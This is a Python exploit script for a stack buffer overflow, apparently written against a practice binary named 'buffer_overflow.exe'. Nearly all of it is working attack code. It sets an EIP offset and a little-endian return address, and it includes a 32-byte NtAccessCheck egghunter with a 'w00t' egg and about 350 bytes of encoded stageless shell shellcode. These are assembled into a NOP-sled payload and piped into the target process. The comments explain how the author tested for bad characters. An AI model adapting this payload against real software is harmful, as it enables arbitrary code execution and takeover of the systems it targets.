Check_Final_Payload_Succeed.py

#! python

import os
import sys
import subprocess
import binascii
import time
import struct

### IF PROGRAM GOES TO ROOT FUNCTION AND CRASHES THEN SHELLCODE CONTAINS NO BAD CHARACTERS
### Find out bad characters are present in shellcode or egghunter code  by putting shellcode or egghunter before EIP is overwritten (IF Bad Characters are present -> EIP will not be overwritten As input is truncated -> Program will not crash will lead to default behavior)

#Convert (77C35459) to Little Endian
ESP_Address = "\x59\x54\xc3\x77"

ESP_Address = "\xC0\x15\x40\x00"


Offset_EIP = 1020

#egg (w00t)
egg = "\x77\x30\x30\x74"
#egghunter NtAccessCheck (AndAuditAlarm) - 32 Bytes
egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8" +\
			"\x77\x30\x30\x74" + \
			"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"

#Stageless Shell Bad Chars '\x00\x0a\x1a' Shellcode size is 350 Bytes
shellcode =  ""
shellcode += "\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
shellcode += "\xb1\xd0\xb9\x59\x83\xeb\xfc\xe2\xf4\x4d\x38\x3b\x59"
shellcode += "\xb1\xd0\xd9\xd0\x54\xe1\x79\x3d\x3a\x80\x89\xd2\xe3"
shellcode += "\xdc\x32\x0b\xa5\x5b\xcb\x71\xbe\x67\xf3\x7f\x80\x2f"
shellcode += "\x15\x65\xd0\xac\xbb\x75\x91\x11\x76\x54\xb0\x17\x5b"
shellcode += "\xab\xe3\x87\x32\x0b\xa1\x5b\xf3\x65\x3a\x9c\xa8\x21"
shellcode += "\x52\x98\xb8\x88\xe0\x5b\xe0\x79\xb0\x03\x32\x10\xa9"
shellcode += "\x33\x83\x10\x3a\xe4\x32\x58\x67\xe1\x46\xf5\x70\x1f"
shellcode += "\xb4\x58\x76\xe8\x59\x2c\x47\xd3\xc4\xa1\x8a\xad\x9d"
shellcode += "\x2c\x55\x88\x32\x01\x95\xd1\x6a\x3f\x3a\xdc\xf2\xd2"
shellcode += "\xe9\xcc\xb8\x8a\x3a\xd4\x32\x58\x61\x59\xfd\x7d\x95"
shellcode += "\x8b\xe2\x38\xe8\x8a\xe8\xa6\x51\x8f\xe6\x03\x3a\xc2"
shellcode += "\x52\xd4\xec\xb8\x8a\x6b\xb1\xd0\xd1\x2e\xc2\xe2\xe6"
shellcode += "\x0d\xd9\x9c\xce\x7f\xb6\x2f\x6c\xe1\x21\xd1\xb9\x59"
shellcode += "\x98\x14\xed\x09\xd9\xf9\x39\x32\xb1\x2f\x6c\x33\xb9"
shellcode += "\x89\xe9\xbb\x4c\x90\xe9\x19\xe1\xb8\x53\x56\x6e\x30"
shellcode += "\x46\x8c\x26\xb8\xbb\x59\xa0\x8c\x30\xbf\xdb\xc0\xef"
shellcode += "\x0e\xd9\x12\x62\x6e\xd6\x2f\x6c\x0e\xd9\x67\x50\x61"
shellcode += "\x4e\x2f\x6c\x0e\xd9\xa4\x55\x62\x50\x2f\x6c\x0e\x26"
shellcode += "\xb8\xcc\x37\xfc\xb1\x46\x8c\xd9\xb3\xd4\x3d\xb1\x59"
shellcode += "\x5a\x0e\xe6\x87\x88\xaf\xdb\xc2\xe0\x0f\x53\x2d\xdf"
shellcode += "\x9e\xf5\xf4\x85\x58\xb0\x5d\xfd\x7d\xa1\x16\xb9\x1d"
shellcode += "\xe5\x80\xef\x0f\xe7\x96\xef\x17\xe7\x86\xea\x0f\xd9"
shellcode += "\xa9\x75\x66\x37\x2f\x6c\xd0\x51\x9e\xef\x1f\x4e\xe0"
shellcode += "\xd1\x51\x36\xcd\xd9\xa6\x64\x6b\x49\xec\x13\x86\xd1"
shellcode += "\xff\x24\x6d\x24\xa6\x64\xec\xbf\x25\xbb\x50\x42\xb9"
shellcode += "\xc4\xd5\x02\x1e\xa2\xa2\xd6\x33\xb1\x83\x46\x8c"

Dummy_Data = ('\x90' * 200)
NoOpSled_ToEggHunter = ('\x90' * (Offset_EIP - (len(Dummy_Data) + len(egg) + len(egg) + len(shellcode) + len(egghunter))))

#Jumps back -60 Btyes
JmpBack = "\xeb\xc4"
"""
print(len(Dummy_Data))
print(len(egg))
print(len(egg))
print(len(shellcode))
print(len(NoOpSled_ToEggHunter))

print(type(Dummy_Data))
print(type(egg))
print(type(shellcode))
print(type(NoOpSled_ToEggHunter))
print(type(egghunter))
print(type(ESP_Address))
print(type(JmpBack))
"""
#final_payload = Dummy_Data + egg + egg + shellcode + NoOpSled_ToEggHunter + egghunter + ESP_Address + JmpBack
final_payload = "\x90" * (Offset_EIP - len(egg+egg+shellcode)) +egg + egg + shellcode + ESP_Address
print(len(final_payload))
final_payload_bytes = final_payload.encode('raw_unicode_escape')
print(hex(final_payload_bytes[1020]))

"""
print(hex(ord(final_payload[1022])))
"""

#print(hex(binascii.unhexlify(final_payload[0])))
p = subprocess.Popen('buffer_overflow.exe', stdin=subprocess.PIPE) #NOTE: no shell=True here
p.stdin.write(final_payload_bytes)
#p.communicate()[0]
p.stdin.close()